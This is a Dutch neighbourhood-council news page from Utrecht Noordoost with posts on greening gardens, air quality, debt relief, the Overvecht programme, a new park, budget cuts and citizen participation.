Nieuws

Duurzaamheid & Natuur | Verkeer & Milieu | Wonen & Ruimtelijke Ordening | Zorg & Welzijn (Jeugd & Volwassenen) | Communicatie | Wijkeconomie

Facebooktwittergoogle_pluspinterest

Doe iets voor je Buurt: Pit én 1.000 euro voor het project!

Vorige jaar werden wij geattendeerd door Ans Hobbelink, bestuurder bij de landelijke organisatie voor hobby tuinders, oftewel AVVN, over de “Doe iets voor je Buurt” project.

Kern met Pit daagt mensen uit die een droom hebben voor hun eigen buurt, dit binnen één jaar te realiseren. Het kan om allerlei ideeën en initiatieven gaan: van het opzetten van een buurtmoestuin, speeltuin, tafeltje dekje; tot het organiseren van een dorpstoneelstuk. Als het je directe omgeving maar verbetert of een impuls geeft. Lukt het je om binnen een jaar het idee te realiseren? Dan ontvang je het predicaat Kern met Pit én 1.000 euro voor het project!

Ans Hobbelink

https://www.kernmetpit.nl/default.aspx

 

Facebooktwittergoogle_pluspinterest

Tegel eruit, plant erin!

Tegel eruit, plant erin!

 

Tuinvereniging Groei & Bloei organiseert in samenwerking met Intratuin op 23 maart weer de succesvolle actie van: neem zelf een steen uit je tuin mee en hier krijg je gratis twee planten voor terug! Op deze dag kun je tussen 10 en 15 uur bij Intratuin Leidsche Rijn en Koningsweg terecht bij de stand van Groei en Bloei Utrecht.

Het is belangrijk voor onze natuur dat tuinen groener worden. Met Operatie Steenbreek (#Steenbreek actie) willen wij iedereen in Nederland enthousiasmeren om de tuin te vergroenen. Met kleine, lokale initiatieven maken we het verschil. Deze actie wordt onder andere ondersteund door het IVN, instituut voor natuureducatie en duurzaamheid en Utrecht Natuurlijk (#waterproof030).

 

Waarom is Operatie Steenbreek belangrijk voor de natuur?

In een tuin met allemaal stenen kan het regenwater niet de grond in zakken naar het grondwater. Het weer wordt extremer. Bij zware regenval kunnen de putten het water niet aan en krijgen we overlast van rioolwater op straat. Bij extreme warmte en droogte is het in ‘stenen’ tuinen veel heter, want planten verdampen water waardoor het koeler wordt. Door de hitte zijn afgelopen zomer zijn veel bomen dood gegaan doordat er te weinig water in de bodem kon komen.

Mede door de ‘verstening’ van de tuinen (en het gebruik van insecticiden) is in de afgelopen 25 jaar 75% van de bijen, vlinders en andere insecten uit onze omgeving  verdwenen. En er zijn zelfs soorten definitief verdwenen, bijvoorbeeld de hommelvlinder.

 

Ook een Informatieavond

Ook IVN, afdeling Vecht en Plassengebied wil zijn steentje (plantje) bijdragen en organiseert daarom op donderdag 16 mei om 20 uur in samenwerking met stadsecoloog Gitty Korsuize een informatieavond over Operatie Steenbreek.  (Locatie wordt later vermeld). Voor meer informatie kunt u contact opnemen met marijkezoetelief@gmail.com.  Andere natuuractiviteiten kunt u vinden op www.utrecht.groei.nl en www.ivn.nl.

 

Dus Nu doen!

Maak gebruik van deze Groei en Bloei actie voor het welzijn van mens en

natuur én uw portemonnee! Twee plantjes per klant, maar meer stenen

inleveren juichen we alleen maar toe.

 

Facebooktwittergoogle_pluspinterest

De Gaard

De wijk Utrecht is aan veel veranderingen onderhevig, daarom is er een visie geschreven hoe de wijk er over 10 jaar mogelijk uit zal zien.

Hebben we nog openbaar groen in 2025?
Hoe staat het in 2025 met alle nieuwbouwprojecten: de Veemarkt, de Gaard, Careyn, de Groene Kop, de Staatsliedenbuurt?
Hebben we een ontmoetingsplein op de Eykmanlaan?
Zijn er veel de Duurzameprojecten geïmplementeerd?
En vooral is er dan eindelijk schone lucht?
Zijn er meer kleinschalige projecten als Wederzijds?
Rijden op de fiets of in de elektrische auto of rijdt er een schone tram door de middenberm van de Kardinaal de Jongweg?
Hoe is het met de sociale cohesie gesteld?

Lees verder in de wijkvisie 2015-2025

Zie pagina’s 55 tot 57

Facebooktwittergoogle_pluspinterest

Frans Soeterbroek

Frans Soeterbroek woont in de wijk Wittevrouwen en is in het dagelijks leven adviseur op het terrein van wat hij ‘samen stad maken’ noemt. Hij noemt zich de Ruimtemaker en adviseert gemeenten hoe je stads- gebieds- en wijkontwikkeling samen met de bewoners aanpakt. Weg van het traditionele participatiebeleid maar veel meer denken in termen van democratische vernieuwing, maatschappelijk ondernemerschap en sterke buurtgemeenschappen.   Ruim vijf jaar geleden is hij samen met initiatiefnemers uit de hele stad het netwerk’ Utrechtse Ruimtemakers’ gestart dat tot doel heeft om het klimaat voor bewonersinitiatieven in de stad te verbeteren.  Dat zouden we niet alleen terug moeten zien in bijvoorbeeld een initiatievenfonds maar ook in het grond- vastgoed- en aanbestedingsbeleid van de gemeente. En daar valt nog veel te verbeteren. Frans doe dit om zijn kennis ook in zijn eigen stad in te zetten maar ook gewoon omdat hij zich druk maakt over wat hij in de stad ziet gebeuren

 

Facebooktwittergoogle_pluspinterest

Herstart Wijkraad Noordoost

Wijkraad Noordoost zoekt vrijwilligers als leden

Wilt u zich hiervoor inzetten en tegelijk Noordoost beter leren kennen, kijk dan op de website www.wijkraadnoordoost.nl

Thema’s zijn: verkeer, groen, veiligheid, eenzaamheid, langdurige werkloosheid, armoede,  schuldsanering , energie transitie etc. Misschien weet De wijkraad is van de wijk en u bent “de wijk.”

Mail of bel, Christiaan Naethuys, voorzitter, 0684803219, c.naethuys@gmail.com

 

 

(Klik op deze link om beter te zien)

 

 

 

 

 

Facebooktwittergoogle_pluspinterest

Nieuwe websitebeheerder

Ik ben Isaac Gielissen. Vanaf nu ben ik de nieuwe websitebeheerder van Wijkraad Utrecht Noordoost. Ik begon vorig jaar met websites bouwen. De eerste website bouwde ik voor mijn oom. Op deze manier kon ik ervaring opdoen. Daarna begon mijn websiteonderneming langzaam te lopen. Ik kreeg verschillende opdrachten. Daardoor werd ik erg vaardig in het bouwen. Voorbeelden van opdrachtgevers zijn: fysiotherapeuten, acteurs, psychologen, tandartsen en nog meer. Ik probeer de websites altijd zo te maken dat ze naderhand gemakkelijk aan te passen zijn. Het is een supertof baantje om naast school te doen. Ik vind het veel leuker dan vakkenvullen of oppassen. Heb je iets voor de website Wijkraad Noordoost stuur mij dan een e-mail naar: info@wijkraadnoordoost.nl.

Facebooktwittergoogle_pluspinterest

Kwetsbare buurten

Een bewonersplatform in de Staatsliedenbuurt: Hoe zit dat? Kan dat? Gaat dat wel lukken? Is het nodig? Wie wonen daar? Wat gaat daar de komende tijd gebeuren? Wie betreft het ? Hoe zullen mensen daarop  reageren? Zijn dit thema’s die als een rode draad door deze buurt zullen gaan?
Allemaal zeer belangrijke vragen als je wat wil doen en met name als je wilt dat wat je doet, er ook toe doet. Generaliserend gezegd hebben we het goed als wijk.  Dat kan gezegd worden maar ook wij zagen al in het begin van de Wijkraad geschiedenis dat we op een paar plekken inwoners hebben die kwetsbaarder waren dan de rest en hiervoor hebben we ons ingezet.

Deze aanpak wil niet zeggen dat de klus geklaard is. Sommige kwetsbare mensen kunnen dusdanig geholpen worden dat ze zelf een nieuwe vorm van leven ontdekken/leren waarmee ze zelf, ongehinderd het pad verder kunnen belopen. Anderen zullen dat punt niet bereiken en wij die het wel zelfstandig belopen kunnen zullen hen hiermee blijven helpen.

In 2017 heeft de Wijkraad Noordoost een volgende “BUURT AANPAK” fase aangepakt:

“We starten in april met een bewonersplatform, opererend vanuit Buurtcentrum De Leeuw, en bestaande uit ongeveer 8 tot 10 personen. Liefst zoveel mogelijk gespreid uit het gebied; oud- en nieuwbouw, mannen en vrouwen, jongeren en ouderen. Zij die zich hiervoor belangeloos willen inzetten.” Lees in de volgende link het begin van een bewoners platform Staatsliedenbuurt:

http://www.wijkraadnoordoost.nl/oproep-bewonersplatform-omgeving-lauwerechtstaatsliedenbuurt/

Daarmee is de klus natuurlijk nog steeds niet geklaard.

“Na een half jaar houdt onze opdracht via de Wijkraad Noordoost op. De deelnemers aan het Bewonersplatform hebben gesteld dat zij graag door willen met het Bewonersplatform…”
Lees wat de bewoners willen: http://www.thesocialfirm.nl/projecten.html

Recentelijk heb ik Christian Naethuys de twee trekkers van The Social Firm (opstarters van het bewonersplatform) mogen ontmoeten tijdens een gemeentelijke participatie conference. Indrukwekkend is mijn omschrijving van hen. Spontaan, sociaal, intelligent, betrokken, ach de superlatieven komen tekort, 2 super sociale power vrouwen  http://www.thesocialfirm.nl/

We raden u deze twee dames aan: ze staan graag voor u klaar en kunnen heel veel bereiken voor JULLIE bewoners.

Facebooktwittergoogle_pluspinterest

Groen, bomen, parken, bereikbaarheid, kwaliteit, normen etc.

Dit zijn punten waar de Wijkraad NoordOost zich vele jaren mee bezig heeft gehouden. Wat groen in de wijk betreft en hierbij bedoel ik in het bijzonder “zelf beheer” en hoe is dat tot stand gekomen? Jaren geleden, in een bijna vergeten college, was er een wethouder met voortschrijdend inzicht, daarmee verwijs ik  naar Robert Giesberts, hij was toen verantwoordelijk voor zowel groen als participatie. Deze man heeft alle Wijkraden aangespoord zich te verdiepen in allerlei onderwerpen, ‘ga de grenzen verkennen’ zei hij, ga naar de bewoners toe en vraag wat je namens hen op moet pakken. Zodoende is de Wijkraad NoordOost destijds aan de slag gegaan via een grote wijkraadpleging met allerlei onderwerpen, (deze zijn overigens nog te vinden op onze website).

http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/Rapport-Wijkpeiling-Noordoost-2007-Niels2.pdf     2006 / 2007
http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/Rapport-WRpleging-20071.pdf   2007 / 2008

Wij allemaal als leden van de wijkraad wilden zelf meer groen en we hoopten dat groen de grote winnaar zou worden. De geluiden die we hoorden waren positief voor de groene kant, maar we wilden niet dat men dacht dat we de resultaten naar onze eigen hand zouden zetten, vandaar het onafhankelijke bureau. Een ander punt wat aandacht behoefde  was kwaliteit dus niet alleen de hoeveelheid groen maar ook de locatie en inrichting daarvan.  Groen als berm tussen snelwegen werd toen door de gemeente als groen beschouwd maar niet door bewoners. Ga jij met je kinderen picknicken in berm tussen de snelwegen in?

Door de motivatie van Wethouder Robert Giesberts heeft de wijkraad het volgende advies uitgebracht aangaande zelf beheer wat tuinieren betreft. We hoeven niet te vertellen wat voor een  impact dat gehad heeft in de stad qua verbeterde lucht en meer groen in beeld, laat staan al het extra plezier dat een grote hoeveelheid  bewoners hierdoor heeft gekregen.

Het advies “Advies Wijkraad Noordoost Beheer Openbaar Groen 2006”
De reactie “Gemeentebericht – Reactie op Wijkraad Groen Advies 2006”

Ik citeer uit bovenstaand advies, graag zelf helemaal lezen. “Wethouder Robert Giesberts:  Overigens waardeer ik het zeer dat u een advies uitgebracht heeft over dit onderwerp. Ik hoop dat we gezamenlijk …….. ”
Dit is verder gaan groeien en in 2009 hebben we ‘Duurzaamheid’ als onderwerp toegevoegd, inmiddels zijn we 10 jaar verder.

http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/DEFINITIEF-Wijkraadpleging-Noordoost-Duurzaam-Wonen-2009-2010.pdf

Nu terug naar de bomen, een integraal onderdeel van alles om ons heen. Willen we überhaupt in leven blijven dan zal er een groot aantal bomen bij moeten komen dat wat er nu gekapt wordt.  Vandaar 1 van onze laatste adviezen.

https://www.utrecht.nl/fileadmin/uploads/documenten/bestuur-en-organisatie/initiatief-en-invloed/Adviezen_van_wijkraden/Noordoost/2018-06-Advies-wijkraad-noordoost-Herplanten-bomen.pdf

https://www.utrecht.nl/fileadmin/uploads/documenten/bestuur-en-organisatie/initiatief-en-invloed/Adviezen_van_wijkraden/Noordoost/2018-12-antwoordbrief-aan-wijkraad-noordoost-over-herplant-bomen.pdf

We willen hiermee laten zien hoe een groep vrijwilligers zich ingezet heeft om hun milieu te beschermen en waar het kon ook ‘verbeteren.’ Het is essentieel dat deze groep vrijwilligers herkend en erkend wordt. Veel van de gegevens bijeengebracht door deze groep zijn terug te vinden in de verschillende partij programma’s.

Facebooktwittergoogle_pluspinterest

Luchtmeetnet

Wat is dat nou weer?
Het is een fantastische ontwikkeling die ons allen kan helpen.
Helpen in de zin van weten welke troep er in de lucht zit.

Van Albert Faber op Twitter het volgende gelezen: “Fijnstof op de Kardinaal de Jongweg (nieuwjaarsnacht) 1250 ug/m3 . Extreem hoog, de wettelijke norm is 50. Het was 4x hoger dan een slechte dag in Delhi. Een pakje sigaretten in een uur is gezonder.”

Toen ik dat las laat ik eens verder kijken, ik was verbaasd. Ik weet weinig over luchtkwaliteit. Uiteraard van fijnstof heb ik gehoord. Maar waar is het, wanneer, welke concentratie?
Het is makkelijk uit te zoeken, kijk op  https://www.luchtmeetnet.nl/


De dagelijkse concentratie fijn stof (PM2.5) is afhankelijk van het weer. In de steden zijn de concentraties overdag gemiddeld iets hoger dan ‘s nachts, vooral door de verkeersbijdrage. PM2.5 is een verzamelnaam voor zwevende, inhaleerbare deeltjes met een maximale doorsnede van 0,0025 millimeter. De wettelijke norm is een jaargemiddelde van 25 (μg/m3). Doordat PM2.5 nog kleiner is dan PM10 kunnen deze deeltjes dieper doordringen in de longen en zijn ze schadelijker voor de gezondheid. Een ieder kan zien waar de luchtkwaliteit abominabel is.

Bekijk alle stations waar Fijn stof (PM2.5) wordt gemeten

 

Facebooktwittergoogle_pluspinterest

Oude schoenen weggooien zonder nieuwe te hebben?

Nee dat gaan we niet doen!
De feestdagen zijn voorbij, we moeten weer aan de bak, zowel Professioneel alsmede ons vrijwilligerswerk gaan we weer aan de slag. De wijkraden staan voor een uitdaging. De politiek wil een andere vorm van participatie.
Het budget voor de wijkraden is flink teruggeschroefd. Dat leverde veel onvrede op.
Na gezamenlijk overleg van alle wijkraden met de wethouder heeft de Wijkraad Leidsche Rijn zich opgeheven en in Noordoost heeft het dagelijks bestuur en een aantal leden zich teruggetrokken.

Echter: er liggen nieuwe kansen. Sabine Hol en Frans Werter hebben een breed gezelschap geformeerd. Ambtenaren, raadsleden en vertegenwoordigers van de wijkraden met ingrediënten om een nieuwe participatie soep te koken.

In maart wordt een grote bijeenkomst gehouden met als doel:

 • Het bereiken van de buurten
 • Welke participatie vormen zijn mogelijk
 • Hoe bereikt men zoveel mogelijk burgers

Op oude schoenen moeten we een nieuwe, gangbare, leest ontwikkelen en samen gaan dat zeker doen.Bekijk deze plaatjes om een idee te krijgen van de enerverende bijeenkomst: ambtenaren, wethouder, wijkraden, raadsleden & smaakmakers van Utrecht. Het gaat niet om de ego’s van enkelingen, een ieder moet gezien en gehoord worden.

Facebooktwittergoogle_pluspinterest

Schulden Stress Vermindering

Dit is een onderwerp wat aan het hart ligt van onze Wijkwethouder Noordoost, Linda Voortman. Hier is een Twitter citaat van Linda: “Ik wil meer mensen uit de schulden helpen. Daarom gaan we vaker schulden afkopen. Dat scheelt stress bij mensen en ze weten sneller waar ze aan toe zijn.” & “Een laag inkomen mag geen belemmering zijn om mee te doen.”

Het is natuurlijk niet bij citaten gebleven. Vanaf 1 januari is er extra geld beschikbaar voor Utrechters met een laag inkomen. Kijk op http://www.utrecht.nl/extravooru  om te zien of u ervoor in aanmerking komt.

https://www.duic.nl/algemeen/gemeente-gaat-vaker-schulden-afkopen-voor-inwoners/
https://www.duic.nl/algemeen/meer-geld-voor-utrechters-met-een-laag-inkomen/

Voor nog meer en andere contacten kunt u bij het volgende terecht: https://armoedecoalitie-utrecht.nl/contact/  Op hun webpagina staat:

“In Utrecht leven ongeveer 25.000 huishoudens in armoede. Hoewel er veel voorzieningen voor hen bestaan, valt het niet mee om snel te achterhalen welke regelingen en voorzieningen voorhanden zijn. Op deze pagina geven we daar een overzicht van. Hierin werken we samen met U Gids waarnaar we dikwijls (over en weer) verwijzen. Een deel van deze informatie en tips vindt u eveneens terug in de hand-out Opgroeien in armoede.”

Waarom noemen we dit als wijkraad? Ten eerste vinden wij het uitermate belangrijk om ons te verdiepen in onderwerpen welke behoren tot de portefeuille van onze eigen wethouder. Ten tweede is armoede onder de bewolking van Noordoost iets wat bij ons als wijkraad Noordoost de volle aandacht heeft en gehad heeft. De Wijkraad is jaren geleden intensief betrokken geweest om 1 van onze buurten (waar armoede het meest aanwezig is) namelijk ‘de staatsliedenbuurt’ te voorzien van een flinke financiële injectie gekoppeld aan vele verbeteringen.

Dit allemaal gezegd hebbende kijken wij er naar uit om een tot een fijne samenwerking te komen met onze wethouder. Ook haar ervaringen als voormalig tweede kamer lid zal ons als wijkraad doen inspireren en ons nog meer in staat stellen om de doelstelling aangaande “Geen Armoede Meer in Utrecht” te realiseren.

Facebooktwittergoogle_pluspinterest

Samen voor Overvecht 2019 – 2022

De Versnelling van Overvecht (2016–2018) wordt Samen voor Overvecht (2019–2022)

Afgelopen week heb ik een overleg van de Wijkraad Overvecht bijgewoond. Ik was zo geïnspireerd door hetgeen inhoudelijk besproken werd dat ik de voorzitster Els Wegdam gevraagd heb om een verslag te maken met wat extra historische elementen. Dat heeft ze ook gedaan…l Lees verder, ik hoop dat jij ook geïnspireerd wordt.

Groetjes Christian Naethuys, voorzitter Wijkraad Noordoost


Samen voor Overvecht is een nieuw integraal programmaplan, dat voortborduurt op het eerdere plan De Versnelling, waarin voor de jaren 2016 – 2020 € 10.000.000 toegekend werd aan de wijk.
De wijkraad Overvecht hield in 2017 zijn wijkraadpleging over het onderwerp Gezond en aangenaam wonen in Overvecht. Dat leidde tot een advies op 15 maart 2018 (een paar dagen voor de gemeenteraadsverkiezingen) aan het College van Burgemeester en Wethouders. Dit advies kwam qua timing op een strategisch moment (de gemeenteraadsverkiezingen waren op 21 maart) waardoor belangrijke punten uit het advies een plaats kregen in het coalitieakkoord. Bovendien werd om de “versnelling te verhogen” € 4.000.000 extra toegekend voor de periode 2018-2022.

De Versnelling van Overvecht (2016 – 2018) wordt Samen voor Overvecht 2019 – 2022

De versnelling (2016-2020)
In de Voorjaarsnota 2016 werd als doel benoemd dat meer wijkbewoners volwaardig kunnen meedoen aan de samenleving en dat kinderen een faire kans krijgen op een goede toekomst. Het motto van de versnelling werd ‘op orde komen, meekomen en verder komen’.
Er werden 5 pijlers benoemd waarop gefocust ging worden.
– Gezonde wijk
– Aanpak sociale problematiek
– Opvoeden en opgroeien
– Werk en ondernemerschap
– Veiligheid
In het programmaplan 2018 werd niet gekozen voor een 6e pijler, maar werd wel opgenomen dat in alle pijlers de rol van armoede in de problematiek onderzocht ging worden.

In 2018 stelde de wijkraad kritische vragen over de resultaten en de uitvoering. Er werd o.a. gevraagd hoeveel wijkbewoners inmiddels volwaardig mee waren gaan doen en hoeveel kinderen een faire kans op een goede toekomst hadden gekregen. Lastige vragen omdat er geen SMART-resultaten waren geformuleerd en er geen SWOT-analyses gemaakt waren.


Wat wordt Samen voor Overvecht (2018-2022)?
In dit programma is het uitgangspunt dat de doelstellingen van de Versnelling overeind blijven maar dat er een extra investering van 4 miljoen en een langere looptijd van twee jaar toegekend wordt. In 2023 moet de wijk een fijne plek zijn om te wonen, werken en te verblijven (zie raadsbrief Samen voor Overvecht d.d. 17 oktober 2018).
Daar wordt een nieuw integraal programmaplan voor geschreven. Afspraken zijn inmiddels gemaakt om de resultaten uit nieuwe evaluaties wel meetbaar te maken. Zo doende nog efficiënter te werk te kunnen gaan. De ambitie hiervoor is als volgt geformuleerd:

In Overvecht zetten bewoners zich samen met corporaties, scholen, ondernemers, buurteams, zorg- en welzijnsinstellingen, politie, vele andere organisaties en de gemeente in voor de ontwikkeling van de wijk, SAMEN voor Overvecht! Deze beweging denkt in kansen en werkt samen in vitale coalities vanuit een integrale aanpak aan een aantrekkelijker woonklimaat, meedoen naar vermogen, ruimte voor ondernemerschap, de beste zorg en steun voor de bewoners die dat nodig hebben, perspectief voor de jeugd en verbeteren van de veiligheid. We versterken de kracht van Overvecht, benoemen en pakken de problemen buurt- en wijkgericht aan en werken aan normherstel waar nodig. Daarmee versterken we de veerkracht van de bewoners van de wijk en de leefbaarheid en werken we aan een betere balans tussen dragende en vragende bewoners. We werken samen aan een wijk waar bewoners zich thuis voelen en trots op zijn en die aantrekkelijk is voor bezoekers, nieuwe bewoners, investeerders en ondernemers.

De vijf pijlers worden omgevormd tot vijf thema’s. De pijlers gezondheid en welzijn worden samengevoegd en het thema “aantrekkelijk woonklimaat” wordt toegevoegd.
De vijf thema’s in hoofdlijnen:

Aantrekkelijk woonklimaat
Dit thema sluit aan bij de ambitie uit het Coalitieakkoord om stadsbreed te gaan streven naar een percentage sociale woningbouw van 35%. In Overvecht is dat momenteel nog 72% en dat zal dus fors omlaag moeten, waarbij er in de andere wijken die onder de norm van 35% zitten, de komende decennia een verhoging van het aantal sociale woningen zal moeten worden gerealiseerd.
In Overvecht zal dit moeten leiden tot een meer divers en gemengd woningaanbod (huur & koop, goedkoop/middelbaar en duur) met aandacht voor meer gerichte toewijzing waardoor leefbaarheid en betrokkenheid worden vergroot

Regie van bewoners op hun eigen ontwikkeling en meedoen naar vermogen
Werkloze bewoners krijgen nieuwe kansen. Er komen doorlopende lijnen van activering naar werk met aandacht voor de intrinsieke motivatie van bewoners en belemmerende factoren om mee te doen.
Er komt ruimte voor ondernemerschap met aanpak van het bedrijventerrein Overvecht.

Doen wat nodig is in zorg en ondersteuning om de gezondheid en welbevinden bewoners te verbeteren
Er wordt ingezet op preventie om complexe problematiek te voorkomen, maar ook op integrale ondersteuning van complexe problematiek.
Op gezondheidsgebied wordt voortgebouwd op de stevige basis die al gelegd is door het programma Krachtige Basiszorg: de beweging van Ziekte en Zorg naar Gezondheid en Gedrag en aansluiten bij behoefte en eigen kracht van bewoner

Perspectief voor de Jeugd
Wie de jeugd heeft, heeft ook de toekomst is hier het uitgangspunt. Overvecht heeft relatief veel jongeren en deze groep groeit als percentage van de totale bevolking van Overvecht. De jeugd zal perspectief geboden worden door hen te laten merken dat zij er toe doen en cruciaal zijn voor de toekomst van Overvecht. Waar nodig zullen grenzen gesteld worden en aan normherstel gewerkt worden: een goede mix tussen preventie en aanpakken van knelpunten. Een veilige, prettige omgeving is voor kinderen cruciaal om op te groeien en hun talenten te ontwikkelen.

Veiligheid: preventie waar mogelijk, repressie/norm herstellen waar nodig
De georganiseerde ondermijnende criminaliteit in de wijk zal worden aangepakt.
Focus komt op Jeugdoverlast en criminaliteit waarbij signalering en tegengaan van radicalisering en polarisatie belangrijke aandachtsgebieden zijn.

Deze vijf thema’s worden de komende tijd in samenwerking met partners in de wijk en gemeente verder uitgewerkt tot een integraal programmaplan.”

Els Wegdam – Voorzitter Wijkraad Overvecht

Bekijk hier de presentatie

Facebooktwittergoogle_pluspinterest

Nieuw stadspark met oog voor water

Het gebied tussen de Eykmanlaan, Winklerlaan, volkstuinenpark De Driehoek en de spoorlijn Utrecht-Amersfoort was lange tijd een rommeltje. Volkstuinders, duivenhouders en stadsnomaden gingen er hun gang. En het was slecht toegankelijk voor omwonenden. Na een herinrichting die jaren duurde, opende in maart 2018 stadspark De Groene Kop. Ab Kools is voorzitter van de Wijkraad Noordoost, die zich hier hard voor maakte.

“Doordat het voormalige weidegebied nooit is opgehoogd, is park De Groene Kop het laagste punt van Utrecht”, weet Ab. “Water speelt er een grote rol. Tot voor kort liepen de kelders aan de Professor Reinwardtlaan, die grenst aan het park, regelmatig onder water.” Voor het plan dat de initiatiefnemers – de Wijkraad Noordoost, De Driehoek, buurtcomité Tuindorp-Oost en stichting Het Lachende Paard – in 2011 aan de gemeente voorlegden, kregen zij in totaal zes ton subsidie. Met een deel van dat geld werd de waterhuishouding verbeterd. Het Zwarte Water, dat door de Professor Reinwardtlaan loopt, is nu verbonden met een nieuwe wateropslag in het park. Daarin is ruimte voor 6.000 m2 oppervlaktewater Wateroverlast lijkt er verleden tijd. Ook de andere extra watergangen, die de gemeente samen met het Hoogheemraadschap De Stichtse Rijnlanden aanlegde, komen uit in die wateropslag.

Het hele bericht op DUIC

Facebooktwittergoogle_pluspinterest

Dagelijks bestuur wijkraad Noordoost treedt af

Wijkraad Noordoost treedt af vanwege onvrede over bezuinigingen
Het dagelijks bestuur van de wijkraad Noordoost is collectief afgetreden omdat het zich niet kan vinden in de ‘rigoureuze’ bezuinigingen die de wijkraad treft. ‘Wij voelen ons als oude schoenen weggegooid’, zegt voormalig voorzitter van de wijkraad Ab Kools in een brief aan het college van burgemeester en wethouders.

Het hele artikel bij het AD

De brief die hier aan vooraf ging.

Facebooktwittergoogle_pluspinterest

Manifest wijkraden : Samen Doen!

Samen Doen!

Betrokkenheid van bewoners is geen luxeproduct, het is een fundamentele voorwaarde voor een goed
functionerende lokale democratie. In Zuidwest staan we in nauw contact met bewoners, en horen we nog te vaak
dat zij zich niet betrokken voelen bij lokale besluitvorming, of juist iets in hun omgeving voor elkaar proberen te
krijgen, maar daar niet in slagen. We staan daarom achter de doelstellingen van het traject “Vernieuwen
Participatie”: het in een open samenwerking en brede setting komen tot verbetering van de samenwerking tussen
bewoners en de gemeente.

Een vaak gehoorde kritiek op de wijkraden is dat hun samenstelling geen afspiegeling vormt van de diversiteit in
Utrecht. Wij zien het als onze opgave om actief te blijven zoeken naar nieuwe leden uit groepen die zich
momenteel minder vertegenwoordigd voelen. Tegelijkertijd zien we dat geringe afspiegeling geen
wijkraad-specifiek probleem is, maar een breder kenmerk van politieke participatie in Nederland. We moeten ons
daarom niet blind staren op letterlijke afspiegeling als criterium voor een goed functionerende wijkraad, maar
feitelijk: in hoeverre zijn de wijkraden in staat om bewoners op te zoeken en te horen die weliswaar geen lid zijn
van de raad, maar wel degelijk via de leden van wijkraad willen participeren?

Participatie kun je niet opleggen, deze komt uit de bewoners zelf, uit de wandelgangen van de buurt. De
wijkraden zijn een samenkomst van de meest betrokken bewoners. De leden van de wijkraden leveren door hun
netwerk, kennis van de wijk en continuïteit van hun participatie een wezenlijke en aanzienlijke bijdrage als
schakel tussen de bewoners en de gemeente. Ze komen door hun betrokkenheid en contacten op voor alle
bewoners, zelfs degenen die anders de aansluiting met de gemeente missen.

Wijkraden zijn dus aanvullend op de in het coalitieakkoord voorgestelde verbreding van participatie.
Georganiseerde, structurele participatie is meer dan ooit nodig in een veranderende maatschappij, waarin
stedelijke vraagstukken complexer zijn, vaak een lange termijn bestrijken en zich op verschillende schaalniveaus
– buurt, wijk of stad – afspelen. Wijkraden, met hun langdurig actieve bewoners die juist door hun ervaring in
participatie gemakkelijk mee kunnen praten, vervullen momenteel deze rol en willen die ook graag samen met de
gemeente oppakken.

De Omgevingswet maakt na 2021 bewoners een formele partij bij ruimtelijke ontwikkelingen. De ABCD-formule,
zoals bijvoorbeeld toegepast bij een pilot in Dichterswijk, geeft bewoners een instrument om hun leefomgeving
zelf vorm te geven. Bij al die mogelijke niveaus van participatie is behoefte aan een vaste kern van bewoners die
vanuit hun enthousiasme en ervaring als spil functioneren voor de rest van de buurt: samen doen.

Hoe ziet samen doen er uit? Een organisatie van bewoners die met de gemeente samenwerkt en advies geeft
heeft allereerst formele en structurele erkenning nodig. We zien nu dat het nog te gemakkelijk is om inbreng van
bewoners, zelfs in formele participatietrajecten, te negeren. Erkenning in de vorm van adviesrecht door
besluitvormers en de ambtelijke organisatie is cruciaal voor een gemeente die werkelijk werk zegt te maken van
bewonersbetrokkenheid. Meer gelijkwaardig, ondersteunend en versterkend naar elkaar. Samen doelen
opstellen en plannen maken. Verder zijn korte lijnen essentieel, bijvoorbeeld door nauwe samenwerking met de
wijkbureaus. En tenslotte wellicht het belangrijkste ingrediënt voor succesvolle participatie: positiviteit. Niet “wij
tegen zij”, maar: samen doen!

Namens wijkraad Zuidwest en de voorzitters van de wijkraden,
Jeroen Heijgen (Voorzitter Zuidwest)

Facebooktwittergoogle_pluspinterest

Verkenning verkeersroute Votulast (terugkoppeling)

In januari 2017 is de gemeente gestart met de “Verkenning verkeersroute Votulast”. Het afgelopen jaar is er samen met u gekeken hoe u deze route ervaart en welke ideeën er zijn om deze route te verbeteren. Nu is het tijd om het resultaat te presenteren. Ook bent u welkom op het vragenuur op woensdag 14 maart vanaf 19.00-21.00 uur bij Kargadoor, Oudegracht 36.
Voor vragen over de uitkomsten van de verkenning en/of over het vervolg kunt u contact opnemen met Margreet Kikkert (projectmanager), via telefoon 14030 of e-mail verkeersroute-votulast@utrecht.nl

De verkeersroute Votulast bestaat uit de straten Kaatstraat, Adelaarstraat, Willem van Noortstraat, Antonius Matthaeuslaan, Juliusstraat/ Ingenhouszstraat en Pieter Nieuwlandstraat. Voor de zomer hebben heeft de gemeente met vier inloopbijeenkomsten, een online enquête en een kentekenonderzoek de huidige situatie in beeld gebracht. Met het kentekenonderzoek is het aandeel doorgaand verkeer over de route gemeten. Ook waren er werksessies met omwonenden en ondernemers, waarbij de vragen ‘Hoe het doorgaand verkeer te verminderen?’ en ‘Hoe de straten in te richten als 30 km-gebied’ centraal stonden.
Bron: gemeente Utrecht

Terugkoppeling
Uit de verkenning blijkt dat een groot deel van de automobilisten die op de route rijdt geen herkomst of bestemming in de wijk heeft. Bewoners vinden o.a. dat de straten te druk zijn, dat voetgangers beter moeten kunnen oversteken en dat de leefbaarheid en verblijfskwaliteit langs de route beter kan.
De gemeenteraad is met een brief geïnformeerd over de uitkomsten van deze verkenning. U vindt deze brief en de uitkomsten van de verkenning op www.utrecht.nl/verkeersroute-votulast. Op deze site staan ook de gegevens van het kentekenonderzoek en de uitkomsten van de enquête.

Motie 155
Voor de Wijkraad Noordoost is dit project onderdeel van de vernieuwing van de wijkparticipatie in Utrecht en is op de voet gevolgd in combinatie met een actieve deelname. Lees hierover meer op “Wij in de wijk” inclusief een bijzonder leuk filmpje met Kerstin en Margreet.

Aangevuld op 15-12-2018
Advies Wijkraad
Reactie Gemeente

Facebooktwittergoogle_pluspinterest

7 november: Buurtenparade ‘Samen maken wij Noordoost’

Kom ook naar de buurtenparade op woensdag 7 november van 19.30 uur tot 21.30 uur in Eethuis De Helden!

